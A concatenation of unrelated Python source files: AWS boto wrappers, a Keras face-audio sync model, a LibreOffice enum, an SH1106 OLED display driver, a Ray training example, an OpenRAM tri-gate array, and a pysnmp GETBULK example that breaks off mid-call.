        # Expose the boto2 module itself for internal use; this is NOT the
        # object exposed via the CLI or returned by the get_boto* helpers.
        # BaseBoto.__getattr__ proxies attribute access to it.
        self._boto = boto
        # Bring the underlying library's logger to the requested level.
        get_logger('boto').setLevel(self._boto_log_level)

    def get_valid_regions(self):
        """
        Gets all AWS regions that Krux can access

        :return: A list of :py:class:`RegionCode.Region` for the known regions. For any new regions
                 for which the enum does not exist, just returns the name of the region as a string.
        :rtype: list[RegionCode.Region]
        """
        connection = self._boto.ec2.connect_to_region(self.cli_region)
        # Map each region name onto the enum when it exists, else keep the raw name.
        return [
            RegionCode.Region[region.name]
            if getattr(RegionCode.Region, region.name, None) is not None
            else region.name
            for region in connection.get_all_regions()
        ]
class Boto3(BaseBoto):
    """boto3 wrapper; credential/region resolution lives in BaseBoto."""

    def __init__(self, *args, **kwargs):
        # Let the superclass resolve credentials, region and log level.
        super(Boto3, self).__init__(*args, **kwargs)
        # boto3 keeps custom settings (region, connection params) in a
        # 'session' object that behaves like the boto3 module itself:
        # http://boto3.readthedocs.org/en/latest/guide/session.html
        # Build one for the region resolved by BaseBoto; this is for internal
        # use, NOT the object exposed via the CLI or the get_boto* helpers.
        self._boto = boto3.session.Session(region_name=self.cli_region)
        # Bring the underlying library's logger to the requested level.
        # http://boto3.readthedocs.org/en/latest/reference/core/boto3.html?highlight=logging
        # XXX the default boto3 logger is named 'botocore', not 'boto3'.
        get_logger('botocore').setLevel(self._boto_log_level)

    def get_valid_regions(self):
        """
        Gets all AWS regions that Krux can access

        :return: A list of :py:class:`RegionCode.Region` for the known regions. For any new regions
                 for which the enum does not exist, just returns the name of the region as a string.
        :rtype: list[RegionCode.Region]
        """
        client = self._boto.client('ec2')
        # Map each region name onto the enum when it exists, else keep the raw name.
        return [
            RegionCode.Region[region.get('RegionName')]
            if getattr(RegionCode.Region, region.get('RegionName'), None) is not None
            else region.get('RegionName')
            for region in client.describe_regions().get('Regions', [])
        ]
|
from keras.models import load_model
import numpy as np
from keras.optimizers import Adam
from keras.models import Model
from keras.layers import Dense, Conv2D, Conv3D, BatchNormalization, Activation, \
Concatenate, AvgPool2D, Input, MaxPool2D, UpSampling2D, Add, \
ZeroPadding2D, ZeroPadding3D, Lambda, Reshape, Flatten, LeakyReLU
# from keras_contrib.layers import InstanceNormalization
from keras.callbacks import ModelCheckpoint
from keras import backend as K
import keras
import cv2
import os
import librosa
import scipy
from keras.utils import plot_model
import tensorflow as tf
import tensorflow_addons as tfa
# from keras.utils import multi_gpu_model
import tensorflow as tf
from keras import backend as K
class ModelMGPU(Model):
    """Proxy that routes load/save calls to the serial (single-GPU) model.

    NOTE(review): the multi_gpu_model call is commented out, so this class
    never initializes its Model base (no super().__init__ and no __dict__
    update from a parallel model). Instances only work as a thin proxy
    around the serial model -- confirm this is intentional while multi-GPU
    support is disabled.
    """
    def __init__(self, ser_model, gpus):
        # pmodel = multi_gpu_model(ser_model, gpus)
        # self.__dict__.update(pmodel.__dict__)
        self._smodel = ser_model
    def __getattribute__(self, attrname):
        '''Override load and save methods to be used from the serial-model. The
        serial-model holds references to the weights in the multi-gpu model.
        '''
        # return Model.__getattribute__(self, attrname)
        # Any attribute containing 'load' or 'save' is delegated to the
        # serial model; everything else resolves normally.
        if 'load' in attrname or 'save' in attrname:
            return getattr(self._smodel, attrname)
        return super(ModelMGPU, self).__getattribute__(attrname)
def contrastive_loss(y_true, y_pred):
    """Contrastive loss over predicted distances.

    As written, y_true == 0 penalizes the squared distance directly, while
    y_true == 1 penalizes distances that fall inside the margin.
    """
    margin = 1.
    similar_term = (1. - y_true) * K.square(y_pred)
    dissimilar_term = y_true * K.square(K.maximum(0., margin - y_pred))
    return K.mean(similar_term + dissimilar_term)
def conv_block(x, num_filters, kernel_size=3, strides=2, padding='same'):
    """Conv2D -> InstanceNormalization -> LeakyReLU(0.2) block.

    :param x: input tensor
    :param num_filters: number of convolution filters
    :param kernel_size: convolution kernel size (default 3)
    :param strides: convolution strides (default 2)
    :param padding: padding mode (default 'same')
    :return: output tensor
    """
    x = Conv2D(filters=num_filters, kernel_size=kernel_size,
               strides=strides, padding=padding)(x)
    # BUG FIX: InstanceNormalization lives in tfa.layers, not at the top level
    # of tensorflow_addons; tfa.InstanceNormalization raises AttributeError.
    x = tfa.layers.InstanceNormalization()(x)
    x = LeakyReLU(alpha=.2)(x)
    return x
def create_model(args, mel_step_size):
    """Build the siamese face/audio embedding model.

    Two conv towers embed a face crop (args.img_size square, 3 channels) and
    an 80 x mel_step_size spectrogram into vectors that are L2-normalized;
    the model outputs the euclidean distance between the two embeddings and
    is compiled with contrastive_loss.

    :param args: namespace providing img_size, n_gpu and lr attributes
    :param mel_step_size: number of spectrogram frames in the audio window
    :return: compiled Keras Model mapping [face, audio] -> distance
    """
    ############# encoder for face/identity
    input_face = Input(shape=(args.img_size, args.img_size, 3), name="input_face_disc")
    x = conv_block(input_face, 64, 7)
    x = conv_block(x, 128, 5)
    x = conv_block(x, 256, 3)
    x = conv_block(x, 512, 3)
    x = conv_block(x, 512, 3)
    x = Conv2D(filters=512, kernel_size=3, strides=1, padding="valid")(x)
    face_embedding = Flatten() (x)
    ############# encoder for audio
    input_audio = Input(shape=(80, mel_step_size, 1), name="input_audio")
    x = conv_block(input_audio, 32, strides=1)
    x = conv_block(x, 64, strides=3) #27X9
    x = conv_block(x, 128, strides=(3, 1)) #9X9
    x = conv_block(x, 256, strides=3) #3X3
    x = conv_block(x, 512, strides=1, padding='valid') #1X1
    x = conv_block(x, 512, 1, strides=1)
    audio_embedding = Flatten() (x)
    # L2-normalize before taking L2 distance
    l2_normalize = Lambda(lambda x: K.l2_normalize(x, axis=1))
    face_embedding = l2_normalize(face_embedding)
    audio_embedding = l2_normalize(audio_embedding)
    # Euclidean distance between the two unit-norm embeddings.
    d = Lambda(lambda x: K.sqrt(K.sum(K.square(x[0] - x[1]), axis=1, keepdims=True))) ([face_embedding,
                                                                                        audio_embedding])
    model = Model(inputs=[input_face, input_audio], outputs=[d])
    model.summary()
    if args.n_gpu > 1:
        # Wrap for multi-GPU training (see ModelMGPU above).
        model = ModelMGPU(model , args.n_gpu)
    model.compile(loss=contrastive_loss, optimizer=Adam(lr=args.lr))
    return model
if __name__ == '__main__':
    # NOTE(review): create_model() requires (args, mel_step_size); calling it
    # with no arguments raises TypeError -- this debug entry point looks stale.
    model = create_model()
    #plot_model(model, to_file='model.png', show_shapes=True)
|
# coding: utf-8
#
# Copyright 2022 :Barry-Thomas-Paul: Moss
#
# Licensed under the Apache License, Version 2.0 (the "License")
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http: // www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# Enum Class
# this is a auto generated file generated by Cheetah
# Namespace: com.sun.star.table
# Libre Office Version: 7.3
from enum import Enum
class ShadowLocation(Enum):
    """
    Enum Class

    Auto-generated mapping of the UNO ``com.sun.star.table.ShadowLocation``
    enum; each member's value is its UNO name as a string.

    See Also:
        `API ShadowLocation <https://api.libreoffice.org/docs/idl/ref/namespacecom_1_1sun_1_1star_1_1table.html#a9ab4ece6abe8ce0c4ad3123d6e3916c0>`_
    """
    # Metadata consumed by the generator/runtime to map this enum back onto
    # its UNO type (namespace, fully-qualified name, type kind).
    __ooo_ns__: str = 'com.sun.star.table'
    __ooo_full_ns__: str = 'com.sun.star.table.ShadowLocation'
    __ooo_type_name__: str = 'enum'
    BOTTOM_LEFT = 'BOTTOM_LEFT'
    """
    shadow is located along the lower and left sides.
    """
    BOTTOM_RIGHT = 'BOTTOM_RIGHT'
    """
    shadow is located along the lower and right sides.
    """
    NONE = 'NONE'
    """
    no shadow.
    """
    TOP_LEFT = 'TOP_LEFT'
    """
    shadow is located along the upper and left sides.
    """
    TOP_RIGHT = 'TOP_RIGHT'
    """
    shadow is located along the upper and right sides.
    """
# Public API of this generated module.
__all__ = ['ShadowLocation']
|
# coding=utf-8
import datetime
# Unix epoch as a *naive* datetime holding UTC wall time; the zero point
# for epoch_seconds() below (only valid against other naive UTC datetimes).
epoch = datetime.datetime.utcfromtimestamp(0)
class DateFormats(object):
    """Namespace of strftime format strings used by this module."""
    # Full timestamp with microseconds, US month/day ordering.
    Full = '%m/%d/%Y %H:%M:%S.%f'
def epoch_seconds(dt):
    """Seconds elapsed between the Unix epoch and *dt* (a naive UTC datetime)."""
    delta = dt - epoch
    return delta.total_seconds()
def formated(dt, format_str=DateFormats.Full):
    """Render *dt* with *format_str* (defaults to the full timestamp format).

    Name kept as-is ("formated", sic) because external callers rely on it.
    """
    return dt.strftime(format_str)
if __name__ == '__main__':
    # Smoke test: print the current local time in the full format.
    print(formated(datetime.datetime.now()))
|
# Py2-era boolean constants used as return flags throughout this driver module.
TRUE = 1 # ACK, YES
FALSE = 0 # NAK, NO
class cursor (object):
    '''
    Tracks a text cursor position on a fixed-size character grid.
    (row, col) are 0-based; "me" is this file's convention for self.
    '''
    def __init__ (me, height, width, show=FALSE):
        me.height = height
        me.width = width
        me.show = show # whether a visible cursor glyph is drawn
        me.reset()
    def reset (me):
        '''home the cursor to the top-left cell'''
        me.row = me.col = 0
    def line_feed (me):
        '''
        return TRUE if need scroll
        '''
        me.row += 1
        if me.row >= me.height:
            # clamp to the last row; caller must scroll the frame
            me.row -= 1
            return TRUE
        return FALSE
    def move_right (me, wrap):
        '''
        move right, no wrap, stop out of bondary
        return (TRUE/FLASE, TRUE/FALSE) to indicate (scroll, line feed)
        '''
        me.col += 1
        if me.col >= me.width:
            # past the right edge: wrap to column 0 and feed a line
            me.col = 0
            return (me.line_feed (), TRUE)
        return (FALSE, FALSE)
    def move_left (me):
        '''
        move left, don't change row, stop at col 0
        '''
        if me.col > 0:
            me.col -= 1
from font import font8x8
class text_frame (object):
    '''
    Page-buffered text frame for an OLED panel; subclasses (e.g. sh1106)
    implement page_flush() for the actual hardware transfer.
    NOTE: this file targets Python 2 (print statements, integer division).

    sh1106  {busmst
           /
    text_frame
    {font \
    {buffer    other_panel {busmst
    {cursor
    '''
    WIDTH = 128
    HEIGHT = 64
    PAGE = 8 # 8-line / page, = font_sizes
    def __init__ (me, font):
        me.ox = 0
        me.oy = 0
        me.sz = me.PAGE
        # NOTE(review): sized WIDTH*HEIGHT*PAGE (65536 entries); a page buffer
        # of WIDTH columns x HEIGHT/PAGE pages would need only 1024 -- confirm.
        me.buffer = [0] * (me.WIDTH *me.HEIGHT *me.PAGE)
        me.cursor = cursor((me.HEIGHT-me.oy) / me.sz, \
                           (me.WIDTH -me.ox) / me.sz) # rows-1, columns-1
        me.font = font if font else font8x8()
        if font and me.cursor.show == TRUE:
            me.put ('_')
    def page_flush (me, pages): raise NotImplementedError()
    def _put_ (me, char):
        '''
        page(s) of the row
        mask(s) of the row
        the row will cover one page or several pages

        NOTE(review): appears unfinished/dead -- pages_row() is not defined
        anywhere in this class and the computed masks are never used; the
        final loop duplicates put() below.
        '''
        rem = ((me.cursor.row+1) * me.sz + me.oy) % me.PAGE
        pages = range(((me.cursor.row) * me.sz + me.oy) / me.PAGE, \
                      ((me.cursor.row+1) * me.sz + me.oy) / me.PAGE + (1 if rem>0 else 0))
        masks = [0xff] * len(pages)
        masks[0] = 0xff << rem
        if rem > 0:
            masks[-1] = 0xff >> (me.PAGE-rem)
        for yy in me.pages_row():
            for xx in range(me.PAGE):
                me.buffer[me.WIDTH *me.cursor.row + \
                          me.PAGE *me.cursor.col + xx] = \
                          me.font.bitmap[ord(char)-ord(' ')][xx]
    def put (me, char):
        # Copy the glyph's PAGE column-bytes into the buffer at the cursor cell.
        # Fonts start at the space character, hence the ord(' ') offset.
        for xx in range(me.PAGE):
            me.buffer[me.WIDTH *me.cursor.row + \
                      me.PAGE *me.cursor.col + xx] = \
                      me.font.bitmap[ord(char)-ord(' ')][xx]
    def scroll (me, row):
        '''
        returns all the pages for flushing
        '''
        # Shift the buffer up by `row` text rows, zero-filling the bottom.
        for xx in range(me.cursor.height):
            for yy in range(me.WIDTH):
                me.buffer[me.WIDTH * xx + yy] = \
                me.buffer[me.WIDTH *(xx+row) + yy] if xx+row < me.cursor.height else 0
        return range(me.cursor.height)
    def putc (me, char, wrap=FALSE, flush=TRUE):
        '''
        support wrap option
        '''
        pages = [me.cursor.row] # page needs flushing
        (scroll, line_feed, erase) = (FALSE, FALSE, me.cursor.show)
        # Deferred wrap: only move to the next line once another glyph arrives.
        if wrap == TRUE and me.cursor.col >= me.cursor.width:
            erase = FALSE
            (scroll, line_feed) = me.cursor.move_right (wrap)
        if me.cursor.col < me.cursor.width:
            if ord(char)>=ord(' ') and ord(char)<127: # printable
                me.put (char)
                (scroll, line_feed) = me.cursor.move_right (wrap)
            elif erase == TRUE:
                me.put (' ') # erase the cursor
        # Control characters:
        if ord(char) == 0x08: # BS
            me.cursor.move_left ()
            me.put (' ') # erase the character
        elif ord(char) == 0x0A: # LF (^j/J)
            # print 'LF'
            (scroll, line_feed) = (me.cursor.line_feed (), me.cursor.show)
        elif ord(char) == 0x0C: # FF (^l/L)
            # print 'FF'
            # form feed: blank the whole frame and home the cursor
            pages = me.scroll (me.cursor.height)
            (scroll, line_feed) = (FALSE, FALSE)
            me.cursor.reset ()
        elif ord(char) == 0x0D: # CR
            # print 'CR'
            me.cursor.col = 0
            if wrap == TRUE:
                (scroll, line_feed) = (me.cursor.line_feed (), me.cursor.show)
        if scroll == TRUE: pages = me.scroll (1)
        elif line_feed == TRUE and \
             me.cursor.show == TRUE: pages += [me.cursor.row]
        if me.cursor.show == TRUE: me.put ('_')
        if flush == TRUE: me.page_flush (pages)
    def puts (me, text, align='left'):
        '''
        no wrap
        '''
        # Position the cursor column according to the requested alignment.
        if align=='left' : me.cursor.col = 0
        elif align=='right' : me.cursor.col = me.cursor.width - len(text)
        elif align=='center': me.cursor.col = (me.cursor.width - len(text))/2
        else: print 'align error'
        for yy in text:
            me.putc (yy, TRUE, TRUE)
        # me.page_flush ([me.cursor.row])
class sh1106 (text_frame):
    '''
    Driver for an SH1106 OLED controller behind an I2C bus master.
    Inherits the text buffer/cursor logic from text_frame and implements
    page_flush() by streaming buffer pages over I2C to device address 0x3c.
    '''
    # SH1106 command bytes
    _SET_CONTRAST = 0x81
    _SET_NORM_INV = 0xa6
    _SET_DISP = 0xae
    _SET_SCAN_DIR = 0xc0
    _SET_SEG_REMAP = 0xa0
    _LOW_COLUMN_ADDRESS = 0x00
    _HIGH_COLUMN_ADDRESS = 0x10
    _SET_PAGE_ADDRESS = 0xb0
    def __init__ (me, i2cmst=None, font=None, flush=TRUE, on=TRUE, off=TRUE):
        text_frame.__init__ (me, font)
        me.busmst = i2cmst # I2C master used for all panel traffic
        me.off = off # power the panel off in __del__?
        if flush: me.page_flush (range(me.HEIGHT/me.PAGE)) # clear all
        if on: me.poweron ()
    def __del__ (me):
        if me.off: me.poweroff ()
        # print 'class %s died' % (me.__class__.__name__)
    def write_cmd (me, cmd):
        me.busmst.write (0x3c,0x80,[cmd]) # Co=1, D/C#=0
    def write_dat (me, buf):
        # control byte 0x40 marks the following bytes as display data
        me.busmst.write (0x3c,0x40,buf)
    def poweron (me):
        me.write_cmd (me._SET_DISP | 0x01)
    def poweroff (me):
        me.write_cmd (me._SET_DISP | 0x00)
    def page_flush (me, pages):
        # NOTE(review): the "| 2" column offset presumably centers the
        # 128-column panel in the SH1106's 132-column RAM -- confirm against
        # the datasheet.
        for page in pages:
            me.write_cmd (me._SET_PAGE_ADDRESS | page)
            me.write_cmd (me._LOW_COLUMN_ADDRESS | 2)
            me.write_cmd (me._HIGH_COLUMN_ADDRESS | 0)
            me.write_dat (me.buffer[me.WIDTH*page : me.WIDTH*(page+1)])
if __name__ == '__main__':

    def test_loop (item):
        '''
        Exercise the raw frame buffer until a key is pressed:
        'blink' = random pixels, 'hline'/'vline' = moving lines.
        Keys '0'/'1'/'2' switch pattern; any other key exits.
        '''
        import msvcrt,random,time
        while 1:
            for xx in range(display.cursor.height):
                for yy in range(len(display.buffer)):
                    if item=='blink': display.buffer[yy] = 0x80 >> random.randint(0,800) # xx
                    elif item=='hline': display.buffer[yy] = 0x80 >> xx
                    elif item=='vline': display.buffer[yy] = 0xff if yy%8==xx else 0
                display.page_flush (range(display.cursor.height)) # flush all
#               if item!='blink': time.sleep (0.3)
                if msvcrt.kbhit(): break
            if msvcrt.kbhit():
                char = msvcrt.getch()
                if char == '0': item = 'blink'
                elif char == '1': item = 'vline'
                elif char == '2': item = 'hline'
                else: break

    def test_fonts (fontFilePath):
        '''
        Render every glyph of each *.?tf font found at the given path;
        any key shows the next font, 'q' quits.
        NOTE(review): msvcrt is not imported in this function's scope --
        works only if it is available globally; confirm.
        '''
        import sys, glob
        flist = glob.glob(fontFilePath+'/*.?tf')
        if len(flist)==0: flist = glob.glob(fontFilePath+'*.?tf')
        if len(flist)==0: flist = [fontFilePath]
        for ffile in flist:
            print ffile.split('\\')[-1]
            display.font = font8x8(ffile,8)
            # Copy the 8-byte bitmap of every glyph into the frame buffer.
            for yy in range(len(display.font.bitmap)):
                for zz in range(8):
                    display.buffer[yy*8 + zz] = display.font.bitmap[yy][zz]
            display.page_flush (range(display.HEIGHT/display.PAGE))
            if msvcrt.getch() == 'q':
                break

    def test_text (text=''):
        '''
        Interactive typing demo; ESC exits. A non-empty *text* first
        prints a banner plus the text right-aligned.
        '''
        import msvcrt
#       display.font = font8x8('.\\font\\ModernDOS.ttf',8)
#       font_path = '/'.join(__file__.replace('\\','/').split('/')[0:-1]) + '/ModernDOS.ttf'
#       display.font = font8x8(font_path,8)
        display.font = font8x8()
        if text != '':
            display.puts ('Canyon-Semi\x0d')
            display.puts (__file__.replace('\\','/').split('/')[-1] + '\x0d')
            display.puts (text, 'right')
        char = 0
        while char != chr(27):
            char = msvcrt.getch()
            display.putc (char, TRUE)

    def test_only ():
        pass

    from cynpy.basic import *
    if not no_argument ():
#       for pp in sys.path: print pp
        import i2c
        i2cmst = i2c.choose_master ()
#       assert i2cmst.probe ()[0]==0x3C, 'SH1106 device not found'
        display = sh1106(i2cmst)
        # Dispatch on the first command-line argument.
        if sys.argv[1]=='loop' : test_loop (sys.argv[2])
        elif sys.argv[1]=='font' : test_fonts (sys.argv[2])
        elif sys.argv[1]=='text' : test_text (sys.argv[2])
        elif sys.argv[1]=='type' : test_text ()
        elif sys.argv[1]=='test' : test_only ()
        else: print "command not recognized"
|
# -*- coding: utf-8 -*-
"""
Count the number of valid sketches in Sketchy database.
Created on Wed Dec  2 10:25:18 2020
@author: lbechberger
"""
import argparse, csv

parser = argparse.ArgumentParser(description='Scan Sketchy labels')
parser.add_argument('input_file', help = 'csv file containing the Sketchy info')
args = parser.parse_args()

# Map each flag-counter key to its CSV column name.
FLAG_COLUMNS = (('error', 'Error?'), ('context', 'Context?'),
                ('ambiguous', 'Ambiguous?'), ('pose', 'WrongPose?'))

# Per-category counters: total sketches plus one counter per flag.
count_dict = {}
with open(args.input_file, 'r') as f_in:
    for row in csv.DictReader(f_in, delimiter=','):
        entry = count_dict.setdefault(
            row['Category'],
            {'all': 0, 'error': 0, 'context': 0, 'ambiguous': 0, 'pose': 0})
        entry['all'] += 1
        for key, column in FLAG_COLUMNS:
            entry[key] += int(row[column])

# Emit one CSV line per category, alphabetically.
print('category,#sketches,#error,#context,#ambiguous,#pose')
for cat in sorted(count_dict):
    counts = count_dict[cat]
    print('{0},{1},{2},{3},{4},{5}'.format(cat, counts['all'], counts['error'],
                                           counts['context'], counts['ambiguous'],
                                           counts['pose']))
import argparse
import tensorflow as tf
from tensorflow.keras.models import Sequential
from tensorflow.keras.layers import Dense
import numpy as np
import ray
from ray import tune
from ray.experimental.sgd.tf.tf_trainer import TFTrainer, TFTrainable
# Number of samples generated for the train and test splits.
NUM_TRAIN_SAMPLES = 1000
NUM_TEST_SAMPLES = 400


def create_config(batch_size):
    """Build the TFTrainer configuration dict for the given batch size.

    Args:
        batch_size (int): Per-step batch size.

    Returns:
        dict: Keys ``batch_size``, ``fit_config`` (steps per epoch) and
        ``evaluate_config`` (evaluation steps).
    """
    train_steps = NUM_TRAIN_SAMPLES // batch_size
    eval_steps = NUM_TEST_SAMPLES // batch_size
    return {
        "batch_size": batch_size,
        "fit_config": {"steps_per_epoch": train_steps},
        "evaluate_config": {"steps": eval_steps},
    }
def linear_dataset(a=2, size=1000):
    """Generate a random dataset following ``y = x / a``.

    The previous implementation hard-coded ``y = x / 2`` and silently
    ignored ``a``; the parameter is now used as the divisor, which keeps
    the default behaviour (a=2) bit-identical while making the parameter
    meaningful.

    Args:
        a (float): Divisor applied to the inputs (default 2, matching
            the previous hard-coded behaviour).
        size (int): Number of samples to generate.

    Returns:
        tuple: Arrays ``(x, y)``, each of shape ``(size, 1)``.
    """
    x = np.random.rand(size)
    y = x / a
    x = x.reshape((-1, 1))
    y = y.reshape((-1, 1))
    return x, y
def simple_dataset(config):
    """Create repeated, batched tf.data train/test pipelines of linear data.

    Args:
        config (dict): Must contain ``batch_size``.

    Returns:
        tuple: ``(train_dataset, test_dataset)`` tf.data.Dataset objects.
    """
    bs = config["batch_size"]
    train_xy = linear_dataset(size=NUM_TRAIN_SAMPLES)
    test_xy = linear_dataset(size=NUM_TEST_SAMPLES)
    # Train split is shuffled over the full sample count; both repeat forever.
    train_dataset = (tf.data.Dataset.from_tensor_slices(train_xy)
                     .shuffle(NUM_TRAIN_SAMPLES)
                     .repeat()
                     .batch(bs))
    test_dataset = tf.data.Dataset.from_tensor_slices(test_xy).repeat().batch(bs)
    return train_dataset, test_dataset
def simple_model(config):
    """Build and compile a small two-layer dense regression model.

    Args:
        config (dict): Unused; present for the TFTrainer creator API.

    Returns:
        A compiled keras Sequential model (SGD, MSE loss/metric).
    """
    net = Sequential([Dense(10, input_shape=(1, )), Dense(1)])
    net.compile(optimizer="sgd",
                loss="mean_squared_error",
                metrics=["mean_squared_error"])
    return net
def train_example(num_replicas=1, batch_size=128, use_gpu=False):
    """Train the example model with a TFTrainer and print statistics.

    Runs two train+validate rounds, then one final validation.

    Args:
        num_replicas (int): Number of training replicas.
        batch_size (int): Per-step batch size.
        use_gpu (bool): Whether replicas should use a GPU.
    """
    trainer = TFTrainer(
        model_creator=simple_model,
        data_creator=simple_dataset,
        num_replicas=num_replicas,
        use_gpu=use_gpu,
        verbose=True,
        config=create_config(batch_size))

    # Two rounds of train + validate, printing merged stats each round.
    for _ in range(2):
        round_stats = trainer.train()
        round_stats.update(trainer.validate())
        print(round_stats)

    # One standalone validation pass at the end.
    print(trainer.validate())
    print("success!")
def tune_example(num_replicas=1, use_gpu=False):
    """Run a small Tune sweep over TFTrainable and return the best config.

    Args:
        num_replicas (int): Number of training replicas per trial.
        use_gpu (bool): Whether replicas should use a GPU.

    Returns:
        dict: Config of the trial with minimal ``validation_loss``.
    """
    trainable_config = {
        "model_creator": tune.function(simple_model),
        "data_creator": tune.function(simple_dataset),
        "num_replicas": num_replicas,
        "use_gpu": use_gpu,
        "trainer_config": create_config(batch_size=128),
    }
    analysis = tune.run(
        TFTrainable,
        num_samples=2,
        config=trainable_config,
        stop={"training_iteration": 2},
        verbose=1)
    return analysis.get_best_config(metric="validation_loss", mode="min")
if __name__ == "__main__":
parser = argparse.ArgumentParser()
parser.add_argument(
"--address",
required=False,
type=str,
help="the address to use for Ray")
parser.add_argument(
"--num-replicas",
"-n",
type=int,
default=1,
help="Sets number of replicas for training.")
parser.add_argument(
"--use-gpu",
action="store_true",
default=False,
help="Enables GPU training")
parser.add_argument(
"--tune", action="store_true", default=False, help="Tune training")
args, _ = parser.parse_known_args()
ray.init(address=args.address)
if args.tune:
tune_example(num_replicas=args.num_replicas, use_gpu=args.use_gpu)
else:
train_example(num_replicas=args.num_replicas, use_gpu=args.use_gpu)
|
# See LICENSE for licensing information.
#
# Copyright (c) 2016-2019 Regents of the University of California and The Board
# of Regents for the Oklahoma Agricultural and Mechanical College
# (acting for and on behalf of Oklahoma State University)
# All rights reserved.
#
import debug
from tech import drc
import design
from vector import vector
from sram_factory import factory
from globals import OPTS
class tri_gate_array(design.design):
    """
    Dynamically generated array of tri-state gates for all bitlines.

    One tri_gate instance is created every ``words_per_row`` columns, so
    the array drives ``word_size`` data bits out of ``columns`` bitlines.
    """

    def __init__(self, columns, word_size, name):
        """
        Initial function of tri gate array.

        :param columns: total number of bitline columns
        :param word_size: number of data bits (tri-gates instantiated)
        :param name: module name
        """
        super().__init__(name)
        debug.info(1, "Creating {0}".format(self.name))

        self.columns = columns
        self.word_size = word_size
        self.words_per_row = int(self.columns / self.word_size)

        self.create_netlist()
        if not OPTS.netlist_only:
            self.create_layout()

    def create_netlist(self):
        # Netlist view only: submodules, pins and instance connectivity.
        self.add_modules()
        self.add_pins()
        self.create_array()

    def create_layout(self):
        # Physical view: size the array, place cells, add pins, verify.
        self.width = (self.columns / self.words_per_row) * self.tri.width
        self.height = self.tri.height

        self.place_array()
        self.add_layout_pins()
        self.add_boundary()
        self.DRC_LVS()

    def add_modules(self):
        # A single tri_gate cell is reused for every instance.
        self.tri = factory.create(module_type="tri_gate")
        self.add_mod(self.tri)

    def add_pins(self):
        """create the name of pins depend on the word size"""
        for i in range(self.word_size):
            self.add_pin("in_{0}".format(i))
        for i in range(self.word_size):
            self.add_pin("out_{0}".format(i))
        for pin in ["en", "en_bar", "vdd", "gnd"]:
            self.add_pin(pin)

    def create_array(self):
        """add tri gate to the array """
        # Instances keyed by starting column index, stepping words_per_row.
        self.tri_inst = {}
        for i in range(0,self.columns,self.words_per_row):
            name = "Xtri_gate{0}".format(i)
            self.tri_inst[i]=self.add_inst(name=name,
                                           mod=self.tri)
            index = int(i/self.words_per_row)
            self.connect_inst(["in_{0}".format(index),
                               "out_{0}".format(index),
                               "en", "en_bar", "vdd", "gnd"])

    def place_array(self):
        """ Place the tri gate to the array """
        for i in range(0,self.columns,self.words_per_row):
            base = vector(i*self.tri.width, 0)
            self.tri_inst[i].place(base)

    def add_layout_pins(self):
        # Per-instance data pins on m2, supplies stacked up to m3,
        # shared en/en_bar rails on m1 spanning the whole array.
        for i in range(0,self.columns,self.words_per_row):
            index = int(i/self.words_per_row)
            in_pin = self.tri_inst[i].get_pin("in")
            self.add_layout_pin(text="in_{0}".format(index),
                                layer="m2",
                                offset=in_pin.ll(),
                                width=in_pin.width(),
                                height=in_pin.height())
            out_pin = self.tri_inst[i].get_pin("out")
            self.add_layout_pin(text="out_{0}".format(index),
                                layer="m2",
                                offset=out_pin.ll(),
                                width=out_pin.width(),
                                height=out_pin.height())

            # Route both supplies
            for n in ["vdd", "gnd"]:
                for supply_pin in self.tri_inst[i].get_pins(n):
                    pin_pos = supply_pin.center()
                    self.add_via_center(layers=self.m2_stack,
                                        offset=pin_pos)
                    self.add_layout_pin_rect_center(text=n,
                                                    layer="m3",
                                                    offset=pin_pos)

        width = self.tri.width * self.columns - (self.words_per_row - 1) * self.tri.width
        en_pin = self.tri_inst[0].get_pin("en")
        self.add_layout_pin(text="en",
                            layer="m1",
                            offset=en_pin.ll().scale(0, 1),
                            width=width,
                            height=drc("minwidth_m1"))
        enbar_pin = self.tri_inst[0].get_pin("en_bar")
        self.add_layout_pin(text="en_bar",
                            layer="m1",
                            offset=enbar_pin.ll().scale(0, 1),
                            width=width,
                            height=drc("minwidth_m1"))
#
# GETBULK Command Generator
#
# Send a series of SNMP GETBULK requests
# with SNMPv2c, community 'public'
# over IPv4/UDP
# to an Agent at 195.218.195.228:161
# with values non-repeaters = 0, max-repetitions = 25
# for two OIDs in tuple form
# stop on end-of-mib condition for both OIDs
#
# This script performs similar to the following Net-SNMP command:
#
# $ snmpbulkwalk -v2c -c public -C n0 -C r25 -ObentU 195.218.195.228 1.3.6.1.2.1.1 1.3.6.1.4.1.1
#
from pysnmp.entity import engine, config
from pysnmp.entity.rfc3413 import cmdgen
from pysnmp.carrier.asynsock.dgram import udp
# Create SNMP engine instance
snmpEngine = engine.SnmpEngine()

#
# SNMPv2c setup
#

# SecurityName <-> CommunityName mapping
config.addV1System(snmpEngine, 'my-area', 'public')

# Specify security settings per SecurityName (SNMPv1 - 0, SNMPv2c - 1)
config.addTargetParams(snmpEngine, 'my-creds', 'my-area', 'noAuthNoPriv', 1)

#
# Setup transport endpoint and bind it with security settings yielding
# a target name
#

# UDP/IPv4 client-mode socket registered under the UDP transport domain
config.addTransport(
    snmpEngine,
    udp.domainName,
    udp.UdpSocketTransport().openClientMode()
)

# Target address 'my-router' bound to the credentials configured above
config.addTargetAddr(
    snmpEngine, 'my-router',
    udp.domainName, ('195.218.195.228', 161),
    'my-creds'
)
# Error/response receiver
def cbFun(sendRequesthandle, errorIndication, errorStatus, errorIndex,
          varBindTable, cbCtx):
    """Response callback: print variable bindings, stop the walk on errors.

    Returns True to keep the dispatcher walking, None to stop.
    """
    if errorIndication:
        # Transport/engine-level problem (e.g. timeout): abort the walk.
        print(errorIndication)
        return
    if errorStatus:
        # SNMP-level error reported by the agent: abort the walk.
        where = errorIndex and varBindTable[-1][int(errorIndex)-1][0] or '?'
        print('%s at %s' % (errorStatus.prettyPrint(), where))
        return
    # Dump every OID/value pair received in this response.
    for bind_row in varBindTable:
        for oid, val in bind_row:
            print('%s = %s' % (oid.prettyPrint(), val.prettyPrint()))
    return True  # signal dispatcher to continue walking
# Prepare initial request to be sent: walk two OID subtrees in parallel
# with non-repeaters=0 and max-repetitions=25; cbFun handles each response.
cmdgen.BulkCommandGenerator().sendReq(
    snmpEngine,
    'my-router',
    0, 25,  # non-repeaters, max-repetitions
    ( ((1,3,6,1,2,1,1), None),
